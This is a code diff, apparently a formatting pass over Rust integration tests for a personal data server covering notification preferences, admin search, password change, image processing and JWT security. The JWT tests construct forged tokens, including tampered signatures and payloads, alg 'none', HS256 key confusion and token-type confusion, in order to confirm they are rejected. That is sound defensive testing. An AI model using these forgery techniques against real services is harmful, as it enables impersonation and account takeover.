··· 1 mod common; 2 use common::{base_url, client, create_account_and_login, get_db_connection_string}; 3 - use tranquil_pds::comms::{NewComms, CommsType, enqueue_comms}; 4 use serde_json::{Value, json}; 5 use sqlx::PgPool; 6 7 async fn get_pool() -> PgPool { 8 let conn_str = get_db_connection_string().await; ··· 33 format!("Subject {}", i), 34 format!("Body {}", i), 35 ); 36 - enqueue_comms(&pool, comms).await.expect("Failed to enqueue"); 37 } 38 39 let resp = client 40 - .get(format!("{}/xrpc/com.tranquil.account.getNotificationHistory", base)) 41 .header("Authorization", format!("Bearer {}", token)) 42 .send() 43 .await ··· 63 "discordId": "123456789" 64 }); 65 let resp = client 66 - .post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base)) 67 .header("Authorization", format!("Bearer {}", token)) 68 .json(&prefs) 69 .send() ··· 71 .unwrap(); 72 assert_eq!(resp.status(), 200); 73 let body: Value = resp.json().await.unwrap(); 74 - assert!(body["verificationRequired"].as_array().unwrap().contains(&json!("discord"))); 75 76 let pool = get_pool().await; 77 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) ··· 92 "code": code 93 }); 94 let resp = client 95 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 96 .header("Authorization", format!("Bearer {}", token)) 97 .json(&input) 98 .send() ··· 101 assert_eq!(resp.status(), 200); 102 103 let resp = client 104 - .get(format!("{}/xrpc/com.tranquil.account.getNotificationPrefs", base)) 105 .header("Authorization", format!("Bearer {}", token)) 106 .send() 107 .await ··· 121 "telegramUsername": "testuser" 122 }); 123 let resp = client 124 - .post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base)) 125 .header("Authorization", format!("Bearer {}", token)) 126 .json(&prefs) 127 .send() ··· 134 "code": "000000" 135 }); 136 let resp = client 137 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 138 .header("Authorization", format!("Bearer {}", token)) 139 .json(&input) 140 .send() ··· 154 "code": "123456" 155 }); 156 let resp = client 157 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 158 .header("Authorization", format!("Bearer {}", token)) 159 .json(&input) 160 .send() ··· 175 "email": unique_email 176 }); 177 let resp = client 178 - .post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base)) 179 .header("Authorization", format!("Bearer {}", token)) 180 .json(&prefs) 181 .send() ··· 183 .unwrap(); 184 assert_eq!(resp.status(), 200); 185 let body: Value = resp.json().await.unwrap(); 186 - assert!(body["verificationRequired"].as_array().unwrap().contains(&json!("email"))); 187 188 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 189 .fetch_one(&pool) ··· 203 "code": code 204 }); 205 let resp = client 206 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 207 .header("Authorization", format!("Bearer {}", token)) 208 .json(&input) 209 .send() ··· 212 assert_eq!(resp.status(), 200); 213 214 let resp = client 215 - .get(format!("{}/xrpc/com.tranquil.account.getNotificationPrefs", base)) 216 .header("Authorization", format!("Bearer {}", token)) 217 .send() 218 .await
··· 1 mod common; 2 use common::{base_url, client, create_account_and_login, get_db_connection_string}; 3 use serde_json::{Value, json}; 4 use sqlx::PgPool; 5 + use tranquil_pds::comms::{CommsType, NewComms, enqueue_comms}; 6 7 async fn get_pool() -> PgPool { 8 let conn_str = get_db_connection_string().await; ··· 33 format!("Subject {}", i), 34 format!("Body {}", i), 35 ); 36 + enqueue_comms(&pool, comms) 37 + .await 38 + .expect("Failed to enqueue"); 39 } 40 41 let resp = client 42 + .get(format!( 43 + "{}/xrpc/com.tranquil.account.getNotificationHistory", 44 + base 45 + )) 46 .header("Authorization", format!("Bearer {}", token)) 47 .send() 48 .await ··· 68 "discordId": "123456789" 69 }); 70 let resp = client 71 + .post(format!( 72 + "{}/xrpc/com.tranquil.account.updateNotificationPrefs", 73 + base 74 + )) 75 .header("Authorization", format!("Bearer {}", token)) 76 .json(&prefs) 77 .send() ··· 79 .unwrap(); 80 assert_eq!(resp.status(), 200); 81 let body: Value = resp.json().await.unwrap(); 82 + assert!( 83 + body["verificationRequired"] 84 + .as_array() 85 + .unwrap() 86 + .contains(&json!("discord")) 87 + ); 88 89 let pool = get_pool().await; 90 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) ··· 105 "code": code 106 }); 107 let resp = client 108 + .post(format!( 109 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 110 + base 111 + )) 112 .header("Authorization", format!("Bearer {}", token)) 113 .json(&input) 114 .send() ··· 117 assert_eq!(resp.status(), 200); 118 119 let resp = client 120 + .get(format!( 121 + "{}/xrpc/com.tranquil.account.getNotificationPrefs", 122 + base 123 + )) 124 .header("Authorization", format!("Bearer {}", token)) 125 .send() 126 .await ··· 140 "telegramUsername": "testuser" 141 }); 142 let resp = client 143 + .post(format!( 144 + "{}/xrpc/com.tranquil.account.updateNotificationPrefs", 145 + base 146 + )) 147 .header("Authorization", format!("Bearer {}", token)) 148 .json(&prefs) 149 .send() ··· 156 "code": "000000" 157 }); 158 let resp = client 159 + .post(format!( 160 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 161 + base 162 + )) 163 .header("Authorization", format!("Bearer {}", token)) 164 .json(&input) 165 .send() ··· 179 "code": "123456" 180 }); 181 let resp = client 182 + .post(format!( 183 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 184 + base 185 + )) 186 .header("Authorization", format!("Bearer {}", token)) 187 .json(&input) 188 .send() ··· 203 "email": unique_email 204 }); 205 let resp = client 206 + .post(format!( 207 + "{}/xrpc/com.tranquil.account.updateNotificationPrefs", 208 + base 209 + )) 210 .header("Authorization", format!("Bearer {}", token)) 211 .json(&prefs) 212 .send() ··· 214 .unwrap(); 215 assert_eq!(resp.status(), 200); 216 let body: Value = resp.json().await.unwrap(); 217 + assert!( 218 + body["verificationRequired"] 219 + .as_array() 220 + .unwrap() 221 + .contains(&json!("email")) 222 + ); 223 224 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 225 .fetch_one(&pool) ··· 239 "code": code 240 }); 241 let resp = client 242 + .post(format!( 243 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 244 + base 245 + )) 246 .header("Authorization", format!("Bearer {}", token)) 247 .json(&input) 248 .send() ··· 251 assert_eq!(resp.status(), 200); 252 253 let resp = client 254 + .get(format!( 255 + "{}/xrpc/com.tranquil.account.getNotificationPrefs", 256 + base 257 + )) 258 .header("Authorization", format!("Bearer {}", token)) 259 .send() 260 .await
+36 -9
tests/admin_search.rs
··· 21 .expect("Failed to send request"); 22 assert_eq!(res.status(), StatusCode::OK); 23 let body: Value = res.json().await.unwrap(); 24 - let accounts = body["accounts"].as_array().expect("accounts should be array"); 25 assert!(!accounts.is_empty(), "Should return some accounts"); 26 - let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did)); 27 - assert!(found, "Should find the created user in results (DID: {})", user_did); 28 } 29 30 #[tokio::test] ··· 61 assert_eq!(res.status(), StatusCode::OK); 62 let body: Value = res.json().await.unwrap(); 63 let accounts = body["accounts"].as_array().unwrap(); 64 - assert_eq!(accounts.len(), 1, "Should find exactly one account with this handle"); 65 assert_eq!(accounts[0]["handle"].as_str(), Some(unique_handle.as_str())); 66 } 67 ··· 100 assert_eq!(res2.status(), StatusCode::OK); 101 let body2: Value = res2.json().await.unwrap(); 102 let accounts2 = body2["accounts"].as_array().unwrap(); 103 - assert!(!accounts2.is_empty(), "Should return more accounts after cursor"); 104 - let first_page_dids: Vec<&str> = accounts.iter().map(|a| a["did"].as_str().unwrap()).collect(); 105 - let second_page_dids: Vec<&str> = accounts2.iter().map(|a| a["did"].as_str().unwrap()).collect(); 106 for did in &second_page_dids { 107 - assert!(!first_page_dids.contains(did), "Second page should not repeat first page DIDs"); 108 } 109 } 110 ··· 160 let account = &accounts[0]; 161 assert!(account["did"].as_str().is_some(), "Should have did"); 162 assert!(account["handle"].as_str().is_some(), "Should have handle"); 163 - assert!(account["indexedAt"].as_str().is_some(), "Should have indexedAt"); 164 }
··· 21 .expect("Failed to send request"); 22 assert_eq!(res.status(), StatusCode::OK); 23 let body: Value = res.json().await.unwrap(); 24 + let accounts = body["accounts"] 25 + .as_array() 26 + .expect("accounts should be array"); 27 assert!(!accounts.is_empty(), "Should return some accounts"); 28 + let found = accounts 29 + .iter() 30 + .any(|a| a["did"].as_str() == Some(&user_did)); 31 + assert!( 32 + found, 33 + "Should find the created user in results (DID: {})", 34 + user_did 35 + ); 36 } 37 38 #[tokio::test] ··· 69 assert_eq!(res.status(), StatusCode::OK); 70 let body: Value = res.json().await.unwrap(); 71 let accounts = body["accounts"].as_array().unwrap(); 72 + assert_eq!( 73 + accounts.len(), 74 + 1, 75 + "Should find exactly one account with this handle" 76 + ); 77 assert_eq!(accounts[0]["handle"].as_str(), Some(unique_handle.as_str())); 78 } 79 ··· 112 assert_eq!(res2.status(), StatusCode::OK); 113 let body2: Value = res2.json().await.unwrap(); 114 let accounts2 = body2["accounts"].as_array().unwrap(); 115 + assert!( 116 + !accounts2.is_empty(), 117 + "Should return more accounts after cursor" 118 + ); 119 + let first_page_dids: Vec<&str> = accounts 120 + .iter() 121 + .map(|a| a["did"].as_str().unwrap()) 122 + .collect(); 123 + let second_page_dids: Vec<&str> = accounts2 124 + .iter() 125 + .map(|a| a["did"].as_str().unwrap()) 126 + .collect(); 127 for did in &second_page_dids { 128 + assert!( 129 + !first_page_dids.contains(did), 130 + "Second page should not repeat first page DIDs" 131 + ); 132 } 133 } 134 ··· 184 let account = &accounts[0]; 185 assert!(account["did"].as_str().is_some(), "Should have did"); 186 assert!(account["handle"].as_str().is_some(), "Should have handle"); 187 + assert!( 188 + account["indexedAt"].as_str().is_some(), 189 + "Should have indexedAt" 190 + ); 191 }
+1 -1
tests/admin_stats.rs
··· 38 .await 39 .unwrap(); 40 assert_eq!(resp.status(), 401); 41 - }
··· 38 .await 39 .unwrap(); 40 assert_eq!(resp.status(), 401); 41 + }
+10 -2
tests/change_password.rs
··· 57 .send() 58 .await 59 .expect("Failed to try old password"); 60 - assert_eq!(login_old.status(), StatusCode::UNAUTHORIZED, "Old password should not work"); 61 let login_new = client 62 .post(format!( 63 "{}/xrpc/com.atproto.server.createSession", ··· 70 .send() 71 .await 72 .expect("Failed to try new password"); 73 - assert_eq!(login_new.status(), StatusCode::OK, "New password should work"); 74 } 75 76 #[tokio::test]
··· 57 .send() 58 .await 59 .expect("Failed to try old password"); 60 + assert_eq!( 61 + login_old.status(), 62 + StatusCode::UNAUTHORIZED, 63 + "Old password should not work" 64 + ); 65 let login_new = client 66 .post(format!( 67 "{}/xrpc/com.atproto.server.createSession", ··· 74 .send() 75 .await 76 .expect("Failed to try new password"); 77 + assert_eq!( 78 + login_new.status(), 79 + StatusCode::OK, 80 + "New password should work" 81 + ); 82 } 83 84 #[tokio::test]
+2 -3
tests/common/mod.rs
··· 1 use aws_config::BehaviorVersion; 2 use aws_sdk_s3::Client as S3Client; 3 use aws_sdk_s3::config::Credentials; 4 - use tranquil_pds::state::AppState; 5 use chrono::Utc; 6 use reqwest::{Client, StatusCode, header}; 7 use serde_json::{Value, json}; ··· 12 #[allow(unused_imports)] 13 use std::time::Duration; 14 use tokio::net::TcpListener; 15 use wiremock::matchers::{method, path}; 16 use wiremock::{Mock, MockServer, ResponseTemplate}; 17 ··· 232 .await; 233 } 234 235 - async fn setup_mock_appview(_mock_server: &MockServer) { 236 - } 237 238 async fn spawn_app(database_url: String) -> String { 239 use tranquil_pds::rate_limit::RateLimiters;
··· 1 use aws_config::BehaviorVersion; 2 use aws_sdk_s3::Client as S3Client; 3 use aws_sdk_s3::config::Credentials; 4 use chrono::Utc; 5 use reqwest::{Client, StatusCode, header}; 6 use serde_json::{Value, json}; ··· 11 #[allow(unused_imports)] 12 use std::time::Duration; 13 use tokio::net::TcpListener; 14 + use tranquil_pds::state::AppState; 15 use wiremock::matchers::{method, path}; 16 use wiremock::{Mock, MockServer, ResponseTemplate}; 17 ··· 232 .await; 233 } 234 235 + async fn setup_mock_appview(_mock_server: &MockServer) {} 236 237 async fn spawn_app(database_url: String) -> String { 238 use tranquil_pds::rate_limit::RateLimiters;
+8 -14
tests/email_update.rs
··· 84 .await 85 .expect("Failed to confirm email"); 86 assert_eq!(res.status(), StatusCode::OK); 87 - let user = sqlx::query!( 88 - "SELECT email FROM users WHERE handle = $1", 89 - handle 90 - ) 91 - .fetch_one(&pool) 92 - .await 93 - .expect("User not found"); 94 assert_eq!(user.email, Some(new_email)); 95 96 let verification = sqlx::query!( ··· 320 .await 321 .expect("Failed to update email"); 322 assert_eq!(res.status(), StatusCode::OK); 323 - let user = sqlx::query!( 324 - "SELECT email FROM users WHERE handle = $1", 325 - handle 326 - ) 327 - .fetch_one(&pool) 328 - .await 329 - .expect("User not found"); 330 assert_eq!(user.email, Some(new_email)); 331 let verification = sqlx::query!( 332 "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE handle = $1) AND channel = 'email'",
··· 84 .await 85 .expect("Failed to confirm email"); 86 assert_eq!(res.status(), StatusCode::OK); 87 + let user = sqlx::query!("SELECT email FROM users WHERE handle = $1", handle) 88 + .fetch_one(&pool) 89 + .await 90 + .expect("User not found"); 91 assert_eq!(user.email, Some(new_email)); 92 93 let verification = sqlx::query!( ··· 317 .await 318 .expect("Failed to update email"); 319 assert_eq!(res.status(), StatusCode::OK); 320 + let user = sqlx::query!("SELECT email FROM users WHERE handle = $1", handle) 321 + .fetch_one(&pool) 322 + .await 323 + .expect("User not found"); 324 assert_eq!(user.email, Some(new_email)); 325 let verification = sqlx::query!( 326 "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE handle = $1) AND channel = 'email'",
+98 -21
tests/image_processing.rs
··· 1 use tranquil_pds::image::{ 2 DEFAULT_MAX_FILE_SIZE, ImageError, ImageProcessor, OutputFormat, THUMB_SIZE_FEED, 3 THUMB_SIZE_FULL, 4 }; 5 - use image::{DynamicImage, ImageFormat}; 6 - use std::io::Cursor; 7 8 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 9 let img = DynamicImage::new_rgb8(width, height); 10 let mut buf = Vec::new(); 11 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 12 buf 13 } 14 15 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 16 let img = DynamicImage::new_rgb8(width, height); 17 let mut buf = Vec::new(); 18 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 19 buf 20 } 21 22 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 23 let img = DynamicImage::new_rgb8(width, height); 24 let mut buf = Vec::new(); 25 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 26 buf 27 } 28 29 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 30 let img = DynamicImage::new_rgb8(width, height); 31 let mut buf = Vec::new(); 32 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 33 buf 34 } 35 ··· 62 63 let small = create_test_png(100, 100); 64 let result = processor.process(&small, "image/png").unwrap(); 65 - assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 66 - assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 67 68 let medium = create_test_png(500, 500); 69 let result = processor.process(&medium, "image/png").unwrap(); 70 - assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail"); 71 - assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail"); 72 73 let large = create_test_png(2000, 2000); 74 let result = processor.process(&large, "image/png").unwrap(); 75 - assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail"); 76 - assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail"); 77 let thumb = result.thumbnail_feed.unwrap(); 78 assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED); 79 let full = result.thumbnail_full.unwrap(); ··· 81 82 let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED); 83 let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1); 84 - assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none()); 85 - assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some()); 86 87 let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL); 88 let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1); 89 - assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none()); 90 - assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some()); 91 92 let disabled = ImageProcessor::new().with_thumbnails(false); 93 let result = disabled.process(&large, "image/png").unwrap(); ··· 100 let jpeg = create_test_jpeg(300, 300); 101 102 let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP); 103 - assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp"); 104 105 let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); 106 - assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg"); 107 108 let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png); 109 - assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png"); 110 } 111 112 #[test] ··· 116 let max_dim = ImageProcessor::new().with_max_dimension(1000); 117 let large = create_test_png(2000, 2000); 118 let result = max_dim.process(&large, "image/png"); 119 - assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 }))); 120 121 let max_file = ImageProcessor::new().with_max_file_size(100); 122 let data = create_test_png(500, 500); 123 let result = max_file.process(&data, "image/png"); 124 - assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. }))); 125 } 126 127 #[test]
··· 1 + use image::{DynamicImage, ImageFormat}; 2 + use std::io::Cursor; 3 use tranquil_pds::image::{ 4 DEFAULT_MAX_FILE_SIZE, ImageError, ImageProcessor, OutputFormat, THUMB_SIZE_FEED, 5 THUMB_SIZE_FULL, 6 }; 7 8 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 9 let img = DynamicImage::new_rgb8(width, height); 10 let mut buf = Vec::new(); 11 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png) 12 + .unwrap(); 13 buf 14 } 15 16 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 17 let img = DynamicImage::new_rgb8(width, height); 18 let mut buf = Vec::new(); 19 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg) 20 + .unwrap(); 21 buf 22 } 23 24 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 25 let img = DynamicImage::new_rgb8(width, height); 26 let mut buf = Vec::new(); 27 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif) 28 + .unwrap(); 29 buf 30 } 31 32 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 33 let img = DynamicImage::new_rgb8(width, height); 34 let mut buf = Vec::new(); 35 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP) 36 + .unwrap(); 37 buf 38 } 39 ··· 66 67 let small = create_test_png(100, 100); 68 let result = processor.process(&small, "image/png").unwrap(); 69 + assert!( 70 + result.thumbnail_feed.is_none(), 71 + "Small image should not get feed thumbnail" 72 + ); 73 + assert!( 74 + result.thumbnail_full.is_none(), 75 + "Small image should not get full thumbnail" 76 + ); 77 78 let medium = create_test_png(500, 500); 79 let result = processor.process(&medium, "image/png").unwrap(); 80 + assert!( 81 + result.thumbnail_feed.is_some(), 82 + "Medium image should have feed thumbnail" 83 + ); 84 + assert!( 85 + result.thumbnail_full.is_none(), 86 + "Medium image should NOT have full thumbnail" 87 + ); 88 89 let large = create_test_png(2000, 2000); 90 let result = processor.process(&large, "image/png").unwrap(); 91 + assert!( 92 + result.thumbnail_feed.is_some(), 93 + "Large image should have feed thumbnail" 94 + ); 95 + assert!( 96 + result.thumbnail_full.is_some(), 97 + "Large image should have full thumbnail" 98 + ); 99 let thumb = result.thumbnail_feed.unwrap(); 100 assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED); 101 let full = result.thumbnail_full.unwrap(); ··· 103 104 let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED); 105 let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1); 106 + assert!( 107 + processor 108 + .process(&at_feed, "image/png") 109 + .unwrap() 110 + .thumbnail_feed 111 + .is_none() 112 + ); 113 + assert!( 114 + processor 115 + .process(&above_feed, "image/png") 116 + .unwrap() 117 + .thumbnail_feed 118 + .is_some() 119 + ); 120 121 let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL); 122 let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1); 123 + assert!( 124 + processor 125 + .process(&at_full, "image/png") 126 + .unwrap() 127 + .thumbnail_full 128 + .is_none() 129 + ); 130 + assert!( 131 + processor 132 + .process(&above_full, "image/png") 133 + .unwrap() 134 + .thumbnail_full 135 + .is_some() 136 + ); 137 138 let disabled = ImageProcessor::new().with_thumbnails(false); 139 let result = disabled.process(&large, "image/png").unwrap(); ··· 146 let jpeg = create_test_jpeg(300, 300); 147 148 let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP); 149 + assert_eq!( 150 + webp_proc 151 + .process(&png, "image/png") 152 + .unwrap() 153 + .original 154 + .mime_type, 155 + "image/webp" 156 + ); 157 158 let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); 159 + assert_eq!( 160 + jpeg_proc 161 + .process(&png, "image/png") 162 + .unwrap() 163 + .original 164 + .mime_type, 165 + "image/jpeg" 166 + ); 167 168 let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png); 169 + assert_eq!( 170 + png_proc 171 + .process(&jpeg, "image/jpeg") 172 + .unwrap() 173 + .original 174 + .mime_type, 175 + "image/png" 176 + ); 177 } 178 179 #[test] ··· 183 let max_dim = ImageProcessor::new().with_max_dimension(1000); 184 let large = create_test_png(2000, 2000); 185 let result = max_dim.process(&large, "image/png"); 186 + assert!(matches!( 187 + result, 188 + Err(ImageError::TooLarge { 189 + width: 2000, 190 + height: 2000, 191 + max_dimension: 1000 192 + }) 193 + )); 194 195 let max_file = ImageProcessor::new().with_max_file_size(100); 196 let data = create_test_png(500, 500); 197 let result = max_file.process(&data, "image/png"); 198 + assert!(matches!( 199 + result, 200 + Err(ImageError::FileTooLarge { max_size: 100, .. }) 201 + )); 202 } 203 204 #[test]
+318 -84
tests/jwt_security.rs
··· 1 #![allow(unused_imports)] 2 mod common; 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 - use tranquil_pds::auth::{ 5 - self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, 6 - TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token, 7 - create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token, 8 - verify_access_token, verify_refresh_token, verify_token, 9 - }; 10 use chrono::{Duration, Utc}; 11 use common::{base_url, client, create_account_and_login, get_db_connection_string}; 12 use k256::SecretKey; ··· 15 use reqwest::StatusCode; 16 use serde_json::{Value, json}; 17 use sha2::{Digest, Sha256}; 18 19 fn generate_user_key() -> Vec<u8> { 20 let secret_key = SecretKey::random(&mut OsRng); ··· 48 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature); 49 let result = verify_access_token(&forged_token, &key_bytes); 50 assert!(result.is_err(), "Forged signature must be rejected"); 51 - assert!(result.err().unwrap().to_string().to_lowercase().contains("signature")); 52 53 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 54 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 55 payload["sub"] = json!("did:plc:attacker"); 56 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 57 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 58 - assert!(verify_access_token(&modified_token, &key_bytes).is_err(), "Modified payload must be rejected"); 59 60 let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 61 let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]); 62 let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig); 63 - assert!(verify_access_token(&truncated_token, &key_bytes).is_err(), "Truncated signature must be rejected"); 64 65 let mut extended_sig = sig_bytes.clone(); 66 extended_sig.extend_from_slice(&[0u8; 32]); 67 - let extended_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&extended_sig)); 68 - assert!(verify_access_token(&extended_token, &key_bytes).is_err(), "Extended signature must be rejected"); 69 70 let key_bytes_user2 = generate_user_key(); 71 - assert!(verify_access_token(&token, &key_bytes_user2).is_err(), "Token signed with different key must be rejected"); 72 } 73 74 #[test] ··· 83 "jti": "attack-token", "scope": SCOPE_ACCESS 84 }); 85 let none_token = create_unsigned_jwt(&none_header, &claims); 86 - assert!(verify_access_token(&none_token, &key_bytes).is_err(), "Algorithm 'none' must be rejected"); 87 88 let hs256_header = json!({ "alg": "HS256", "typ": TOKEN_TYPE_ACCESS }); 89 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&hs256_header).unwrap()); ··· 95 mac.update(message.as_bytes()); 96 let hmac_sig = mac.finalize().into_bytes(); 97 let hs256_token = format!("{}.{}", message, URL_SAFE_NO_PAD.encode(&hmac_sig)); 98 - assert!(verify_access_token(&hs256_token, &key_bytes).is_err(), "HS256 substitution must be rejected"); 99 100 for (alg, sig_len) in [("RS256", 256), ("ES256", 64)] { 101 let header = json!({ "alg": alg, "typ": TOKEN_TYPE_ACCESS }); 102 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 103 let fake_sig = URL_SAFE_NO_PAD.encode(&vec![1u8; sig_len]); 104 let token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 105 - assert!(verify_access_token(&token, &key_bytes).is_err(), "{} substitution must be rejected", alg); 106 } 107 } 108 ··· 114 let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token"); 115 let result = verify_access_token(&refresh_token, &key_bytes); 116 assert!(result.is_err(), "Refresh token as access must be rejected"); 117 - assert!(result.err().unwrap().to_string().contains("Invalid token type")); 118 119 let access_token = create_access_token(did, &key_bytes).expect("create access token"); 120 let result = verify_refresh_token(&access_token, &key_bytes); 121 assert!(result.is_err(), "Access token as refresh must be rejected"); 122 - assert!(result.err().unwrap().to_string().contains("Invalid token type")); 123 124 - let service_token = create_service_token(did, "did:web:target", "com.example.method", &key_bytes).unwrap(); 125 - assert!(verify_access_token(&service_token, &key_bytes).is_err(), "Service token as access must be rejected"); 126 } 127 128 #[test] ··· 136 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 137 "jti": "test", "scope": "admin.all" 138 }); 139 - let result = verify_access_token(&create_custom_jwt(&header, &invalid_scope, &key_bytes), &key_bytes); 140 - assert!(result.is_err() && result.err().unwrap().to_string().contains("Invalid token scope")); 141 142 let empty_scope = json!({ 143 "iss": did, "sub": did, "aud": "did:web:test.pds", 144 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 145 "jti": "test", "scope": "" 146 }); 147 - assert!(verify_access_token(&create_custom_jwt(&header, &empty_scope, &key_bytes), &key_bytes).is_err()); 148 149 let missing_scope = json!({ 150 "iss": did, "sub": did, "aud": "did:web:test.pds", 151 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 152 "jti": "test" 153 }); 154 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_scope, &key_bytes), &key_bytes).is_err()); 155 156 for scope in [SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED] { 157 let claims = json!({ ··· 159 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 160 "jti": "test", "scope": scope 161 }); 162 - assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok()); 163 } 164 165 let refresh_scope = json!({ ··· 167 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 168 "jti": "test", "scope": SCOPE_REFRESH 169 }); 170 - assert!(verify_access_token(&create_custom_jwt(&header, &refresh_scope, &key_bytes), &key_bytes).is_err()); 171 } 172 173 #[test] ··· 181 "iss": did, "sub": did, "aud": "did:web:test.pds", 182 "iat": now - 7200, "exp": now - 3600, "jti": "test", "scope": SCOPE_ACCESS 183 }); 184 - let result = verify_access_token(&create_custom_jwt(&header, &expired, &key_bytes), &key_bytes); 185 assert!(result.is_err() && result.err().unwrap().to_string().contains("expired")); 186 187 let future_iat = json!({ 188 "iss": did, "sub": did, "aud": "did:web:test.pds", 189 "iat": now + 60, "exp": now + 7200, "jti": "test", "scope": SCOPE_ACCESS 190 }); 191 - assert!(verify_access_token(&create_custom_jwt(&header, &future_iat, &key_bytes), &key_bytes).is_ok()); 192 193 let just_expired = json!({ 194 "iss": did, "sub": did, "aud": "did:web:test.pds", 195 "iat": now - 10, "exp": now - 1, "jti": "test", "scope": SCOPE_ACCESS 196 }); 197 - assert!(verify_access_token(&create_custom_jwt(&header, &just_expired, &key_bytes), &key_bytes).is_err()); 198 199 let far_future = json!({ 200 "iss": did, "sub": 